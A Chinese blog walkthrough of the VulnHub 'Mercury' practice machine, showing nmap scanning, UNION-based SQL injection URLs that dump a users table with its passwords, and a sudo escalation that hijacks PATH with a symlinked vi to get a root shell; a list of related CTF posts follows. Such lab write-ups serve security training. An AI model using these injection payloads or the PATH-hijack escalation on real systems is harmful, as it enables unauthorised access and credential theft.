vulnhub-Mercury
靶机描述
Difficulty: EasyMercury is an easier box, with no bruteforcing required. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware. Any questions/issues or feedback please email me at: SirFlash at protonmail.com
下载 https://www.vulnhub.com/entry/the-planets-mercury,544/
清单
信息搜集
- netdiscover
- nmap
利用
- sql注入
提权
- sudo
信息搜集
靶机IP
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5uRAiFrP-1601208030462)(http://do.yutian233.xyz/image-20200927194449462.png)]
端口扫描
nmap -sS -sV -p- 192.168.0.112
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
8080/tcp open http-proxy WSGIServer/0.2 CPython/3.8.2
8080
由python 搭建
当访问时 http://192.168.0.112:8080/1
可以看出给出了目录 mercuryfacts
mercuryfacts
存在sql注入
http://192.168.0.112:8080/mercuryfacts/88888 union select group_concat(table_name) from information_schema.tables where table_schema=database()
(('facts,users',),)http://192.168.0.112:8080/mercuryfacts/88888 union select group_concat(column_name) from information_schema.columns where table_name='users'(('id,password,username',),)http://192.168.0.112:8080/mercuryfacts/88888 union select group_concat(id,password,username) from users
(('1johnny1987john,2lovemykids111laura,3lovemybeer111sam,4mercuryisthesizeof0.056Earthswebmaster',),)
使用 webmaster mercuryisthesizeof0.056Earths 来登录
webmaster
拿到shell 来到 notes.txt
得到用户 linuxmaster 用户的密码
linuxmaster
提权方法来自
ln -s /bin/vi tail
export PATH=.:$PATH
sudo -u root --preserve-env=PATH /usr/bin/check_syslog.sh
:/bin/bash
root
vulnhub-Mercury相关推荐
- vulnhub靶场——THE PLANETS: MERCURY
THE PLANETS:MECURY 准备 攻击机: kali 靶机: THE PLANETS:MECURY NAT 192.168.91.0 网段 下载连接: https://www.vulnhub ...
- 看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets:Mercury
Vulnhub靶机The Planets:Mercury渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏 ...
- 【Vulnhub靶场】Earth
目录 前言 一.信息收集 0x00 arp-scan扫描 0x01 nmap扫描 二.目录扫描 0x00 dirb扫描 0x01 XOR解密 三.漏洞利用 0x00 命令执行漏洞 0x01 反弹she ...
- vulnhub Earth:解题思路
靶场下载地址: The Planets: Earth ~ VulnHubThe Planets: Earth, made by SirFlash. Download & walkthrough ...
- vulnhub-The Planets: Mercury
The Planets: Mercury ~ VulnHub 靶机: 攻击机: Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 ( ...
- 靶机渗透练习82-The Planets:Mercury
靶机描述 靶机地址:https://www.vulnhub.com/entry/the-planets-mercury,544/ Description Difficulty: Easy Mercur ...
- 看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets:Venus
Vulnhub靶机The Planets:Venus渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:SSH ...
- Mercury的三件“利器”
Mercury的三件"利器" "工欲善其事,必先利其器",测试软件的选择对整个系统测试工作的顺利实施是至关重要.但是,在众多的测试厂商中海关总署为什么选择了Me ...
- Mercury:唯品会全链路应用监控系统解决方案详解
姚捷,唯品会平台架构部高级架构师,加入唯品会前有超过 10 年的金融/保险互联网技术架构和团队管理经验,擅长以产品思维设计和构建系统.现专注于互联网基础架构,负责唯品会全链路监控/分析平台的开发,管理 ...
- 渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!
Android4靶机简介 名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...
最新文章
- sap系统搭建教程_Nios ii最小系统搭建教程
- Oracle数据类型与.NET中的对应关系
- mysql8 2058_SQLyog连接MySQL8.0及以上版本出现2058错误解决方案
- The .NET Core runtime can be found at:(Windows)
- rtc芯片rx8025t在linux 3.10下的的驱动
- 数据结构(一):数组
- 最好用的WIN7WIN10激活工具
- RS232通信协议详解
- libnet发包java语言_Net-speeder多倍发包脚本
- Ubuntu16.04安装ftp配置
- 44道javaScript变态题(上)
- 挖掘企业数据矿产,袋鼠云数栈(DTinsight)助力企业搭建数据中台
- 【算力网络】算力网络的技术创新——绿色与安全关键技术
- 【云计算的1024种玩法】一.半小时轻松搭建属于自己的Discuz论坛
- 走进诺奖大师系列:科斯(Ronald H.Coase)
- flash播放器插件与flash播放器的区别
- 企业微信监控服务器数据接入,如何在alertmanager报警中添加企业微信监控报警
- 哈工大计算机学硕专硕分开排名,哈工大计算机考研经验谈
- Jinja2中怎么使用宏?
- html地图根据坐标定位,百度地图js根据经纬度定位和拖动定位点
热门文章
- 收高德仍无解,阿里还有三步棋
- android root 缺少busybox,手机安装不了Busybox已经root安装后显示让更换路径..
- Gstreamer编译
- Python语言是解释性语言还是编译性语言?
- centos8时间比实际时间快8小时
- BZOJ 4668: 冷战 并查集
- Golang-go mod download 出现 dial tcp 34.64.4.17:443: i/o timeout
- 红米airdots掉了怎么查找_戒网瘾神器红米路由器ac2100
- 微商怎么在百度引流?微商百度引流怎么做?
- ANTLR4入门(二):图示说明eclipse Antlr4IDE插件的安装及语法测试过程